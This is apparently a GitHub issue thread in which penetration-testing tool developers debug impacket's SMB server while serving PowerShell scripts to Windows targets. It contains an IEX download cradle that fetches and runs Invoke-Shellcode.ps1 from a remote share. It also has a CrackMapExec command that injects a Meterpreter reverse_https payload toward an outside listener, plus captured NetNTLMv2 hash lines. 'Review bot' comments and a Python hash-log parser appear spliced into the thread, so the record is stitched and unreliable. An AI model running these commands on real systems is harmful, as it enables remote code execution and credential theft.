smbserver: Connection reset by peer && command not implemented #105

Closed
byt3bl33d3r opened this issue Nov 1, 2015 · 19 comments · Fixed by #1550

Comments

@byt3bl33d3r
Contributor

Hey man!

I'm currently trying to download powershell scripts over smb on Windows 10 using the following command:

IEX (New-Object Net.WebClient).DownloadString("file://172.16.112.1/TMP/Invoke-Shellcode.ps1");

smbserver.py and my custom smb server class give me the following output:

2015-10-31 18:54:11 Config file parsed
2015-10-31 18:54:11 Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-10-31 18:54:11 Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2015-10-31 18:54:17 Incoming connection (172.16.112.130,51854)
2015-10-31 18:54:17 Not implemented command: 0x0
2015-10-31 18:54:17 Handle: [Errno 104] Connection reset by peer
2015-10-31 18:54:17 Closing down connection (172.16.112.130,51854)

Let me know if you need some additional information.

Cheers

@asolino
Collaborator

asolino commented Nov 1, 2015

hey mate..

Let me know if you need some additional information.

A pcap capture of the SMB Session would be awesome.

Does it fail with SMBv2 / v1 or both?

thanks

@byt3bl33d3r
Contributor Author

with SMBv1:

#~ sudo smbserver.py -debug TMP hosted 
Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (172.16.112.130,52289)
[+] Not implemented command: 0x0
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (172.16.112.130,52289)
[*] Remaining connections []

With SMBv2 it seems to work:

#~ sudo smbserver.py -debug -smb2support TMP hosted    
Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (172.16.112.130,52291)
[*] AUTHENTICATE_MESSAGE (DESKTOP-2KI1H76\adrugdealer,DESKTOP-2KI1H76)
[*] User adrugdealer\DESKTOP-2KI1H76 authenticated successfully
[*] adrugdealer::DESKTOP-2KI1H76:4141414141414141:0508f44dde9d9d68380ff762c4380262:...
[*] Connecting Share(1:tmp)

But it fails:

PS C:\Users\adrugdealer> IEX (New-Object Net.WebClient).DownloadString("file://172.16.112.1/TMP/Invoke-Shellcode.ps1");
Exception calling "DownloadString" with "1" argument(s): "The specified server cannot perform the requested operation.
"
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("file://172.16.112.1/TM ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

PCAP of SMBv1:
https://mega.nz/#!CJgxQJTb!IIomiaPXPjKBkbz7xLz6ErI8tNagO5j4ty2-RJTJQVg

PCAP of SMBv2:
https://mega.nz/#!XEIxjYJT!ZnjC8s1xWkwsBcQ7XwkHxGinww_QzFMTkpdi8eoopto

@byt3bl33d3r
Contributor Author

Didn't mean to close :/

@asolino
Collaborator

asolino commented Nov 1, 2015

Hmm.. I still can't reproduce.

The PCAP for SMBv1 only shows the target system trying to connect to your smbserver using SMBv2. That's because you might have connected using SMBv2 before, and the target knows and cached you talk SMBv2 (and not SMBv1) hence it doesn't negotiate the protocol version again. In order to fix that you will need to boot the target in between tests (or revert snapshot)

The PCAP for SMBv2 shows the file was opened but then when asking for file information, the object cannot be found. That is strange, and I couldn't reproduce in here. What I did was:

The target is a Windows 10.
The Host machine IP is: 172.16.123.1

  1. Created a file called Invoke-Shellcode.ps1 containing a single line and placed it in /tmp:
     Write-Host "Hey there, I'm working"
  2. Then I ran smbserver.py this way:
     For SMBv1:
     ./smbserver.py tmp /tmp
     For SMBv2:
     ./smbserver.py -smb2support tmp /tmp
  3. In the target, I created a file test.ps1 containing:
     IEX (New-Object Net.WebClient).DownloadString("file://172.16.123.1/TMP/Invoke-Shellcode.ps1");
  4. At the target, I ran:
     powershell -exec bypass -file test.ps1

The result is I get the Hey there, I'm working string back.

Do you get the same errors following these steps?

If so (and that's the intention), we will need to dig deeper on the OS config side. Anything in particular set up on that Win 10?
I can put some extra debugging data in smbserver.py to help understand the problem. I'd love to be able to reproduce it myself tho.

thanks dude.

@byt3bl33d3r
Contributor Author

I rebooted the VM and the original error didn't happen anymore so that was a problem with the SMBv1/v2 caching.
Now for some reason with smbserver.py it works fine but when I use my custom smbserver class all I get is:

2015-11-01 19:45:01 Config file parsed
2015-11-01 19:45:01 Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-11-01 19:45:01 Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2015-11-01 19:45:03 Incoming connection (192.168.1.15,51451)
2015-11-01 19:45:03 AUTHENTICATE_MESSAGE (\,WIN-MNID1A21FST)
2015-11-01 19:45:03 User \WIN-MNID1A21FST authenticated successfully
2015-11-01 19:45:03 :::00::

and the PS script is never downloaded

If you want to take a look at the smbserver class, it's here:
https://github.com/byt3bl33d3r/CrackMapExec/blob/master/crackmapexec.py#L273

Also you could just test it yourself by running:

sudo python crackmapexec.py --verbose -t 100 192.168.1.15 -u Administrator -p password --force-ps32 --server smb --inject met_reverse_https --met-options 192.168.1.9 5656

@asolino
Collaborator

asolino commented Nov 2, 2015

First try using SMBv1. I think you forgot to tell the DCERPC SRVSVC the list of shares you have. Here's the diff:

diff --git a/crackmapexec.py b/crackmapexec.py
index 87e9a6f..30a6375 100755
--- a/crackmapexec.py
+++ b/crackmapexec.py
@@ -283,7 +283,7 @@ class SMBserver:
         self.smbConfig.set('global','rpc_apis','yes')
         self.smbConfig.set('global','credentials_file',str(''))
         self.smbConfig.set('global', 'challenge', str(''))
-        self.smbConfig.set("global", 'SMB2Support', 'True')
+        self.smbConfig.set("global", 'SMB2Support', 'False')

         # IPC always needed
         self.smbConfig.add_section('IPC$')
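Review bot: setting 'SMB2Support' to 'False' on the `self.smbConfig.set("global", 'SMB2Support', ...)` line disables SMBv2 for every client rather than fixing why SMBv2 failed; since the failure is attributed to the share path being relative (`self.smbConfig.set('TMP','path', 'hosted')`), the durable change is to store an absolute path for the share (e.g. via os.path.abspath) and leave SMB2 selectable, and this line deserves a comment recording that it is a temporary workaround so it is not forgotten once the SMBv2 relative-path handling is fixed.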
@@ -318,6 +318,8 @@ class SMBserver:
         self.wkstServer.daemon = True
         self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.srvsServer.getListenPort()))
         self.server.registerNamedPipe('wkssvc',('127.0.0.1',self.wkstServer.getListenPort()))
+        self.srvsServer.setServerConfig(self.smbConfig)
+        self.srvsServer.processConfigFile()

     def serve_forever(self):
         self.srvsServer.start()
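Review bot: the two added calls configure only self.srvsServer; self.wkstServer, created before this hunk and registered on the line just above, receives no setServerConfig/processConfigFile, so if it also reads anything from the config it will keep running unconfigured. Either give wkstServer the same two calls or add a comment stating that only the SRVSVC pipe needs the share list (it is what answers share enumeration such as `net view`). Also consider moving the two calls to directly after srvsServer is constructed, so the config is loaded before registerNamedPipe runs rather than as the last step of __init__.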

Check if with these changes everything works fine.

If you enable SMB2, there will be an error due to this line

self.smbConfig.set('TMP','path', 'hosted')

Looks like SMBv2 does not support specifying a share as a relative path. That's a bug that should be fixed in the SMBv2 code.

@byt3bl33d3r
Contributor Author

Applied the diff and still the same, took a look at the traffic and it seems like the server is having a hard time reading the requested file (don't quote me on that).

Here is the pcap: https://mega.nz/#!mFQlgTLD!wkrxX-6YPGTuHQEKJNPFJ_nELto1Hp_fv73AxvTzLGM

@asolino
Collaborator

asolino commented Nov 2, 2015

Anything written out at the console? Any error?

What are you doing at the target? What about, from cmd.exe:

net view \\172.16.183.1
start \\172.16.183.1
copy \\172.16.183.1\tmp\Invoke-Shellcode.ps1

@asolino
Collaborator

asolino commented Nov 2, 2015

Just in case also, git pull impacket to the latest version.

@byt3bl33d3r
Contributor Author

On the latest commit:

  • net view \\172.16.183.1 just hangs, no output is given.
  • start \\172.16.183.1 works fine.
  • copy \\172.16.183.1\tmp\Invoke-Shellcode.ps1 hangs and gives the following output on the server:
2015-11-02 10:07:39 Incoming connection (172.16.183.138,51593)
2015-11-02 10:07:39 AUTHENTICATE_MESSAGE (WIN-MNID1A21FST\byt3bl33d3r,WIN-MNID1A21FST)
2015-11-02 10:07:39 User byt3bl33d3r\WIN-MNID1A21FST authenticated successfully
2015-11-02 10:07:39 byt3bl33d3r::WIN-MNID1A21FST:4141414141414141:5bc5923d1ddcb62d3a367b5febc4f6dc:010100000000000080ff57fa9015d1015f0df0ca2e980eed000000000100100047006a0057004f006f004a0043006d00020010006b00760059005600490069006d0057000300100047006a0057004f006f004a0043006d00040010006b00760059005600490069006d0057000700080080ff57fa9015d10106000400020000000800300030000000000000000100000000200000aaab615cb5e7b569477012a75b8a6c32ab924048f37e9373fa99218179054b8d0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100380033002e003100000000000000000000000000
2015-11-02 10:07:39 Unknown level for query path info! 0x109

And when using an IEX cradle keep getting this:

2015-11-02 10:02:57 Config file parsed
2015-11-02 10:02:57 Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2015-11-02 10:02:57 Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2015-11-02 10:02:58 Incoming connection (172.16.183.138,51587)
2015-11-02 10:02:58 AUTHENTICATE_MESSAGE (\,WIN-MNID1A21FST)
2015-11-02 10:02:58 User \WIN-MNID1A21FST authenticated successfully
2015-11-02 10:02:58 :::00::4141414141414141
2015-11-02 10:04:19 Handle: [Errno 104] Connection reset by peer
2015-11-02 10:04:19 Closing down connection (172.16.183.138,51587)
2015-11-02 10:04:19 Remaining connections []
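The authentication lines in these captures (user::domain:... followed by the fixed challenge 4141414141414141) are exactly what a defender keys on when an unexpected SMB share appears on the network. The following is an added parser, not part of impacket or CrackMapExec, that extracts the account, domain and NTLM variant from smbserver-style log lines, handles the anonymous `:::00::...` case seen above, and flags the static challenge; the log lines, names and hash values in SAMPLE_LOG are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Hypothetical helper (not impacket's or CrackMapExec's code): parses the NetNTLM lines
# impacket's smbserver prints on successful authentication, in both prefixes seen in this thread.
PREFIX_RE = re.compile(r"^(?:\[\*\]|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(.*)$")
# user::domain:field3:field4:field5  (v2: challenge:NTProofStr:blob, v1 layout: LM:NT:challenge)
HASH_RE = re.compile(r"^([^:]*)::([^:]*):([0-9a-fA-F]*):([0-9a-fA-F]*):([0-9a-fA-F]*)$")
# The fixed 8-byte challenge (ASCII "AAAAAAAA") that every session in the captures above shows.
STATIC_CHALLENGE = "4141414141414141"

@dataclass
class NtlmAuthEvent:
    user: str
    domain: str
    variant: str          # "NTLMv2", "NTLMv1" or "anonymous"
    challenge: str        # server challenge as lowercase hex
    static_challenge: bool

def parse_line(line: str) -> Optional[NtlmAuthEvent]:
    """Return an event for a hash line, or None for any other log line."""
    m = PREFIX_RE.match(line.strip())
    if not m:
        return None
    h = HASH_RE.match(m.group(1))
    if not h:
        return None
    user, domain, f3, f4, f5 = h.groups()
    if len(f3) == 16 and len(f4) == 32:        # NetNTLMv2: challenge, NTProofStr, blob
        variant, challenge = "NTLMv2", f3
    elif len(f5) == 16:                         # NetNTLMv1 layout: LM, NT, challenge
        variant, challenge = ("NTLMv1" if user else "anonymous"), f5
    else:                                       # e.g. ":::00::" with no challenge logged
        return None
    challenge = challenge.lower()
    return NtlmAuthEvent(user, domain, variant, challenge, challenge == STATIC_CHALLENGE)

def parse_log(text: str) -> List[NtlmAuthEvent]:
    """Parse a whole smbserver log, keeping only authentication events."""
    return [ev for ev in map(parse_line, text.splitlines()) if ev]

# Constructed sample in the two formats seen in the thread (values are not real credentials).
SAMPLE_LOG = """\
[*] Incoming connection (172.16.183.138,51587)
[*] alice::WORKSTATION1:4141414141414141:0123456789abcdef0123456789abcdef:0101000000000000aabbccddeeff0011
2015-11-02 10:02:58 :::00::4141414141414141
2015-11-02 10:02:58 :::00::
"""
```

A static challenge repeated across many sessions from one host is the signal to alert on; a real server issues a fresh random challenge per negotiation.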

@byt3bl33d3r
Contributor Author

@asolino net view works now

@byt3bl33d3r
Contributor Author

it's really weird cause everything works as expected when using smbserver.py

@asolino
Collaborator

asolino commented Nov 2, 2015

Well it's really weird because it's working on my side even using crackmapexec running it this way (different IPs/pwds):

sudo python crackmapexec.py --verbose -t 100 192.168.1.15 -u Administrator -p password --force-ps32 --server smb --inject met_reverse_https --met-options 192.168.1.9 5656

I can browse the TMP share, download the files, and use the IEX stuff.

Is it working on other OSes?

@byt3bl33d3r
Contributor Author

wut? ahah

what OSes are you using? Atm I'm running Debian and I'm currently using Windows 7 as the target.

@asolino
Collaborator

asolino commented Nov 2, 2015

You mentioned Windows 10 at the beginning of this issue. That's what I'm using.

crackmapexec.py is running on OSx.

Looks like it's not related to Windows 10 then.

Why don't you use the SimpleSMBServer class? Look at https://github.com/CoreSecurity/impacket/blob/master/examples/smbserver.py#L55

@byt3bl33d3r
Contributor Author

@asolino Already tried SimpleSMBServer, same result. Will try again with the latest commit just to make sure

@byt3bl33d3r
Contributor Author

Just tried using SimpleSMBServer and nothing changes. At this point I'm thinking it might be a Linux issue (??) since it works for you on OSX

@asolino
Collaborator

asolino commented Nov 2, 2015

Just ran crackmapexec from a Kali box and it worked, again!

@byt3bl33d3r
Contributor Author

@asolino ok, it's gotta be my system then. Closing. Sorry for the trouble mate
